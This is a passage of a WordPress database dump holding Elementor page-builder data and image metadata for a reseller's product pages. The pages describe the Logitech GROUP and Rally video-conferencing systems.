FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"99a4e2b\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"5968086\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"51b43f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>SPEAKERPHONE WITH BLUETOOTH<\\/h4><p>Hear and be heard with life-like clarity. GROUP\\u2019s full-duplex speakerphone provides 360\\u00b0 coverage with four omnidirectional mics. Beamforming technology helps pick up speech throughout a 6m \\/ 20 ft diameter while reducing keyboard clicks and other audible distractions. You can even pair GROUP with your smartphone or tablet to enjoy outstanding audio clarity and ample volume with mobile applications and conference calls.<\\/p>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5b98fa4\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"c3150a6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>CERTIFIED FOR BUSINESS<\\/h4><p>GROUP offers a plug-and-play USB connection to conference room computers, and is certified for Skype for Business, Microsoft Cortana\\u00ae, Cisco Jabber\\u2122 compatible, and offers enhanced integration with BlueJeans, Broadsoft, LifeSize Cloud, Vidyo, and Zoom. If your preferred application can recognize a webcam, you can use it with GROUP.<\\/p>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"31efa46\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8d36663\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>CONVENIENT CONTROLS<\\/h4><p>GROUP\\u2019s speakerphone provides a convenient dock for the handheld remote control, and features an LCD status screen and tactile buttons to mute audio, adjust volume, move the camera, and more.<\\/p>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f572933\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"c52992d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>AVAILABLE EXPANSION MICS<\\/h4><p>Extend the range of the GROUP video conferencing system with Logitech GROUP Expansion Mics. Accommodate up to 20 people in one large room and make sure everyone\\u2019s voice can be heard. Simply plug the microphones into the GROUP speakerphone: they are automatically recognized and configured. An indicator light shows when the microphone is muted, when a call is active, and when Bluetooth wireless pairing has begun.<\\/p>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"616c1d1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"cea2e79\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8c9754e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>MUTE WITH CONFIDENCE<\\/h4><p>With tactile mute buttons on the speakerphone, handheld remote, and optional expansion mics, GROUP makes it easy to assure your privacy. When muted, GROUP\\u2019s LED status ring lights up red, a subtle yet obvious assurance that\\u2019s easily seen throughout the room.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"542032b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6ed52df\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>CABLING MADE EASY<\\/h4><p>GROUP\\u2019s compact Hub simplifies cabling and makes it easy to run cables under tables and through conduit. Integrated data and power means that the camera and speakerphone each connect with a single cable. The included 5m \\/ 16 ft cables give you lots of placement options, while optional extended cables offer double or triple the reach.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4ae168e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2371100\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>FIELD UPGRADEABLE<\\/h4><p>With regular firmware updates, Logitech continuously improves the GROUP video conferencing experience. For example, recent updates delivered substantial improvements to automatic echo cancellation and gain control, plus upgraded beamforming and duplex performance. It\\u2019s another reason why Logitech delivers the best value proposition in the industry.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b1f3494\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"99173ce\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f1cfa7b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>[maxbutton id=\\\"3\\\" ]<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(5324,2910,'_elementor_version','0.4'),(5326,2911,'_wp_attached_file','2019/02/rally-system-b2b-pdp.jpg'),(5327,2911,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:930;s:6:\"height\";i:523;s:4:\"file\";s:32:\"2019/02/rally-system-b2b-pdp.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"rally-system-b2b-pdp-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"rally-system-b2b-pdp-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:32:\"rally-system-b2b-pdp-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:32:\"rally-system-b2b-pdp-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:32:\"rally-system-b2b-pdp-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:32:\"rally-system-b2b-pdp-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:30:\"rally-system-b2b-pdp-20x11.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5328,2911,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:4.23275020987906458458382985554635524749755859375;s:5:\"bytes\";i:7462;s:11:\"size_before\";i:176292;s:10:\"size_after\";i:168830;s:4:\"time\";d:0.09000000000000001054711873393898713402450084686279296875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.36000000000000031974423109204508364200592041015625;s:5:\"bytes\";i:465;s:11:\"size_before\";i:7307;s:10:\"size_after\";i:6842;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.13999999999999968025576890795491635799407958984375;s:5:\"bytes\";i:923;s:11:\"size_before\";i:15036;s:10:\"size_after\";i:14113;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.359999999999999875655021241982467472553253173828125;s:5:\"bytes\";i:2018;s:11:\"size_before\";i:60100;s:10:\"size_after\";i:58082;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.30999999999999960920149533194489777088165283203125;s:5:\"bytes\";i:872;s:11:\"size_before\";i:13823;s:10:\"size_after\";i:12951;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.53000000000000024868995751603506505489349365234375;s:5:\"bytes\";i:1444;s:11:\"size_before\";i:31883;s:10:\"size_after\";i:30439;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.609999999999999875655021241982467472553253173828125;s:5:\"bytes\";i:1740;s:11:\"size_before\";i:48143;s:10:\"size_after\";i:46403;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(5329,2912,'_wp_attached_file','2019/02/rally-system-b2b-pdp-1.jpg'),(5330,2912,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:930;s:6:\"height\";i:523;s:4:\"file\";s:34:\"2019/02/rally-system-b2b-pdp-1.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"rally-system-b2b-pdp-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:34:\"rally-system-b2b-pdp-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:34:\"rally-system-b2b-pdp-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:34:\"rally-system-b2b-pdp-1-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:34:\"rally-system-b2b-pdp-1-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:34:\"rally-system-b2b-pdp-1-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:32:\"rally-system-b2b-pdp-1-20x11.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5331,2912,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:6.08875999055744809851375975995324552059173583984375;s:5:\"bytes\";i:3611;s:11:\"size_before\";i:59306;s:10:\"size_after\";i:55695;s:4:\"time\";d:0.1700000000000000122124532708767219446599483489990234375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.519999999999999573674358543939888477325439453125;s:5:\"bytes\";i:178;s:11:\"size_before\";i:3224;s:10:\"size_after\";i:3046;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.04999999999999982236431605997495353221893310546875;s:5:\"bytes\";i:219;s:11:\"size_before\";i:5410;s:10:\"size_after\";i:5191;s:4:\"time\";d:0.11000000000000000055511151231257827021181583404541015625;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.29000000000000003552713678800500929355621337890625;s:5:\"bytes\";i:1403;s:11:\"size_before\";i:19240;s:10:\"size_after\";i:17837;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.04000000000000003552713678800500929355621337890625;s:5:\"bytes\";i:212;s:11:\"size_before\";i:5246;s:10:\"size_after\";i:5034;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.660000000000000142108547152020037174224853515625;s:5:\"bytes\";i:592;s:11:\"size_before\";i:10465;s:10:\"size_after\";i:9873;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.410000000000000142108547152020037174224853515625;s:5:\"bytes\";i:1007;s:11:\"size_before\";i:15721;s:10:\"size_after\";i:14714;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(5332,2913,'_wp_attached_file','2019/02/rally-system-b2b-pdp-2.jpg'),(5333,2913,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:930;s:6:\"height\";i:524;s:4:\"file\";s:34:\"2019/02/rally-system-b2b-pdp-2.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"rally-system-b2b-pdp-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:34:\"rally-system-b2b-pdp-2-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:34:\"rally-system-b2b-pdp-2-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:34:\"rally-system-b2b-pdp-2-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:34:\"rally-system-b2b-pdp-2-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:34:\"rally-system-b2b-pdp-2-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:32:\"rally-system-b2b-pdp-2-20x11.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5334,2913,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:9.1162978782555956769328986410982906818389892578125;s:5:\"bytes\";i:7214;s:11:\"size_before\";i:79133;s:10:\"size_after\";i:71919;s:4:\"time\";d:0.09000000000000001054711873393898713402450084686279296875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.20000000000000017763568394002504646778106689453125;s:5:\"bytes\";i:259;s:11:\"size_before\";i:4177;s:10:\"size_after\";i:3918;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.5800000000000000710542735760100185871124267578125;s:5:\"bytes\";i:385;s:11:\"size_before\";i:6894;s:10:\"size_after\";i:6509;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.050000000000000710542735760100185871124267578125;s:5:\"bytes\";i:3008;s:11:\"size_before\";i:24963;s:10:\"size_after\";i:21955;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.19000000000000039079850466805510222911834716796875;s:5:\"bytes\";i:356;s:11:\"size_before\";i:6861;s:10:\"size_after\";i:6505;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.87000000000000010658141036401502788066864013671875;s:5:\"bytes\";i:1152;s:11:\"size_before\";i:14646;s:10:\"size_after\";i:13494;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.5099999999999997868371792719699442386627197265625;s:5:\"bytes\";i:2054;s:11:\"size_before\";i:21592;s:10:\"size_after\";i:19538;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(5335,2914,'_wp_attached_file','2019/02/rally-system-b2b-pdp-3.jpg'),(5336,2914,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:930;s:6:\"height\";i:524;s:4:\"file\";s:34:\"2019/02/rally-system-b2b-pdp-3.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"rally-system-b2b-pdp-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:34:\"rally-system-b2b-pdp-3-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:34:\"rally-system-b2b-pdp-3-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:34:\"rally-system-b2b-pdp-3-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:34:\"rally-system-b2b-pdp-3-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:34:\"rally-system-b2b-pdp-3-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:32:\"rally-system-b2b-pdp-3-20x11.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5337,2914,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:9.1421662212040217809772002510726451873779296875;s:5:\"bytes\";i:7183;s:11:\"size_before\";i:78570;s:10:\"size_after\";i:71387;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.57000000000000028421709430404007434844970703125;s:5:\"bytes\";i:227;s:11:\"size_before\";i:4075;s:10:\"size_after\";i:3848;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.4199999999999999289457264239899814128875732421875;s:5:\"bytes\";i:376;s:11:\"size_before\";i:6939;s:10:\"size_after\";i:6563;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.03999999999999914734871708787977695465087890625;s:5:\"bytes\";i:3011;s:11:\"size_before\";i:25006;s:10:\"size_after\";i:21995;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.3300000000000000710542735760100185871124267578125;s:5:\"bytes\";i:359;s:11:\"size_before\";i:6732;s:10:\"size_after\";i:6373;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.0800000000000000710542735760100185871124267578125;s:5:\"bytes\";i:1203;s:11:\"size_before\";i:14882;s:10:\"size_after\";i:13679;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.589999999999999857891452847979962825775146484375;s:5:\"bytes\";i:2007;s:11:\"size_before\";i:20936;s:10:\"size_after\";i:18929;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(5344,2915,'_elementor_edit_mode','builder'),(5345,2915,'_elementor_template_type','post'),(5346,2915,'_wp_page_template','template-fullwidth.php'),(5348,2915,'_elementor_data','[{\"id\":\"008e84f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"21f0da0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"34477cd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>RALLY<\\/h3><p>Premium Ultra-HD ConferenceCam system with automatic camera control<\\/p><ul><li>RightSense\\u2122 technology automates a better user experience<\\/li><li>Modular audio for full coverage of medium to very large rooms<\\/li><li>Premium components and sleek industrial design<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5bb4207\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"b5262b0\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/rally-system-b2b-pdp.png\",\"id\":1249},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9021bd\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d99b4d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"21995c0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ALL TOGETHER NOW<\\/h3><p>Logitech Rally delivers studio-quality video, unmatched voice clarity, and RightSense\\u2122 automation for better meetings with video conferencing applications that work with USB devices, including Google Hangouts Meet, Microsoft Skype\\u00ae for Business, Microsoft Teams, and Zoom. With modular audio, thoughtful cable management and premium finishes, Rally integrates beautifully into medium and larger rooms.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a0aee94\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"218bc5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"434bad8\",\"elType\":\"widget\",\"settings\":{\"title\":\"KEY FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0624977\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"cb4a385\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"2d24280\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/uwx62jjxOnE\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"742163f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"b70394f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>STUDIO-QUALITY VIDEO<\\/h3><p>With an Ultra-HD imaging system, Rally delivers brilliantly sharp video, outstanding color, and exceptional optical accuracy at resolutions up to 4K. Logitech RightLight\\u2122technology optimizes light balance to emphasize faces and render natural-looking skin tones, even in dim or backlit conditions.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bd1e4d0\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"92a5761\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"c4d9848\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ADVANCED MODULAR AUDIO<\\/h3><p>Crystal-clear audio is essential for world-class video conferencing, and Rally excels in delivering sound that\\u0092s natural, crisp, and highly intelligible. Logitech RightSound\\u0099\\u2122 enhances voice clarity by suppressing background noise, auto-leveling voices, and focusing on active speakers. Exquisitely sensitive mic pods ensure that everyone in the meeting can be clearly heard while stand-alone speakers fill larger rooms with rich, life-like sound.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a921491\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"3fa5585\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/rally-system-b2b-pdp.jpg\",\"id\":2911}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"58834df\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"5c2d6f7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"456e282\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/rally-system-b2b-pdp-1.jpg\",\"id\":2912}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"fc84764\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"0b27f55\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>SLEEK INDUSTRIAL DESIGN<\\/h3><p>Every component in the Rally system features premium industrial design suitable for any professional setting. Even as Rally helps everyone look and sound great during video meetings, each part of the system looks great in its own right. The premium PTZ camera at the core of the system is elegantly finished in matte black with slate gray metal trim, complemented by sleekly designed audio components and accessories that look great in any room.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f623216\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"3614128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"61805be\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ENHANCED USER EXPERIENCE<\\/h3><p>Logitech RightSense\\u2122 is a suite of technologies built into Rally that automate a better user experience. RightSight\\u2122 perfectly auto-frames participants no matter their distance from the lens. RightLight\\u2122 prioritizes faces over environment to render natural-looking skin tones while RightSound\\u0099\\u2122 enhances vocal clarity by suppressing background noise, auto-leveling voices, and focusing on active speakers to support better meetings \\u2014 